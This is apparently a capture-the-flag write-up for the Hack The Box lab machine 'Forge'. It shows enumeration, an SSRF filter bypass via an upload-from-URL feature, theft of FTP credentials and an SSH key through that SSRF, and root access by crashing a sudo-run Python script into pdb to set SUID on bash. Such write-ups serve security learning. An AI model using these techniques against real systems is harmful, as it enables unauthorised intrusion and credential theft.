Hackthebox Forge Writeup

Description

Hackthebox release new machine called forge, in this machine we need to abuse a upload from url functionality to access a subdomain page and from there we got the creads for ftp user and we use that to see file inside ftp server and get id_rsa for user and for privexec we need to crash a python file and hop into pdb mode and get root shell.

Nmap

┌───[us-free-1]─[10.10.14.61]─[root@parrot]─[~/Desktop/HTB/Forge]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.11.111
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-12 03:19 CDT
Nmap scan report for 10.10.11.111
Host is up (0.085s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds

There are three ports open 21:ftp(filtered),22:ssh,80:http

Port-80

When we go to the ip it will redirected to forge.htb

Let’s quickly add that in our /etc/hosts file.

┌───[us-free-1]─[10.10.14.61]─[root@parrot]─[~/Desktop/HTB/Forge]
└──╼ [★]$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       parrot
 
#custom
10.10.11.111    forge.htb
 
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let’s check what’s running on the port 80.

It’s a simple gallery page.

And when we go to upload an image page we can see that there is two options to upload file

upload through local file
upload through url

After some hit and try to upload php rev shell through changing shell.php to shell.php.jpg but that’s didn’t work.

After that i try finding sub-domain with gobuster and i got admin.forge.htb

┌───[us-free-1]─[10.10.14.61]─[root@parrot]─[~/Desktop/HTB/Forge]
└──╼ [★]$ gobuster vhost -u http://forge.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 -r
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://forge.htb
[+] Method:       GET
[+] Threads:      50
[+] Wordlist:     /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/09/12 03:26:55 Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.forge.htb (Status: 200) [Size: 27]

After that i quickly add that in my host file.

┌───[us-free-1]─[10.10.14.61]─[root@parrot]─[~/Desktop/HTB/Forge]
└──╼ [★]$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       parrot
 
#custom
10.10.11.111    forge.htb admin.forge.htb
 
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let’s go to admin.forge.htb

And we see only localhost is allowed.

After that i think we can access that admin page with upload from url functionality which we see in the forge.htb/upload page.

For that let’s first capture that req in burp.

And we can only use http,https.

So let’s first try with loopback address.

And we see it’s a blacklisted address.

After that let’s check if we can access the admin.forge.htb

And we see it’s also a blacklisted address.

Let’s capitalize all letters of the sub-domain to check if it’s bypass the filter.

url=http://ADMIN.FORGE.HTB&remote=1

And we see we successfully bypass the filter and get the link.

let’s open that link and see what’s inside that admin page.

And we can see firefox can’t open that so let’s try with curl.

And we get the html souce code of the admin page.

And there is an /announcements page let’s take a look on that.

┌───[us-free-1]─[10.10.14.61]─[root@parrot]─[~/Desktop/HTB/Forge]
└──╼ [★]$ curl http://forge.htb/uploads/hpD9pJzjkTaU2WVmy7tW
<!DOCTYPE html>
<html>
<head>
    <title>Admin Portal</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <header>
            <nav>
                <h1 className=""><a href="/">Portal home</a></h1>
                <h1 className="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 className="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br><br>
    <br><br><br><br>
    <center><h1>Welcome Admins!</h1></center>
</body>
</html>

Now let’s add /announcements in the req.

url=http://ADMIN.FORGE.HTB/announcements&remote=1

Now let’s check what’s inside that page with curl.

Boom we got the ftp creads and some notes

But the problem is we can’t login inside ftp with these creads because the ftp port is filtered.

But the notes said they support ftp,ftps,http,https for uploading the file through ?u= parameter.

So we can use this functionality to login inside ftp server.

┌───[us-free-1]─[10.10.14.61]─[root@parrot]─[~/Desktop/HTB/Forge]
└──╼ [★]$ curl http://forge.htb/uploads/GPpfUw16plRT0JZocTg8
<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
            <nav>
                <h1 className=""><a href="/">Portal home</a></h1>
                <h1 className="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 className="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>
</body>
</html>

Let’s list the directory and files of ftp server.

url=http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1&remote=1

Got the url.

It’s seems like we are inside the home directory of user it’s mean .ssh folder is also there let’s quickly check it out.

Let’s try to get the id_rsa of the user.

url=http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa&remote=1

Got the id_rsa of the user.

id_rsa

Let’s ssh in real quick and get the user.txt.

Privilege escalation

Before start with LinPEAS let’s try some manual enumeration.

And we see we can run sudo command without password.

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
 
User user may run the following commands on forge:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
user@forge:~$

Let’s check the remote-manage.py script.

user@forge:~$ cat /opt/remote-manage.py
#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb
 
port = random.randint(1025, 65535)
 
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

We can clearly see that if we manage to create some error so we go to the except handler inside Python Debugger and as we running it as root so we can easily execute command with os module in the system.

For that we need to ssh connection one is for start the server and second is for connect to the server.

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py

For create an error i use '\ in my netcat you use anything you want.

Now we are inside the pdb let’s import the os module and use our old trick for geeting root.

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Listening on localhost:31202
invalid literal for int() with base 10: b"'\"
> /opt/remote-manage.py(27)&#x3C;module>()
-> option = int(clientsock.recv(1024).strip())
(Pdb) import os
(Pdb) os.system("ls /root")
clean-uploads.sh  root.txt  snap
0
(Pdb) os.system("chmod +s /bin/bash")
0
(Pdb) exit()
user@forge:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18  2020 /bin/bash
user@forge:~$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt
6bbb84f76b9de4d37e8a7ed270691877

Here is the id_rsa of root for those who only wants points.

id_rsa_root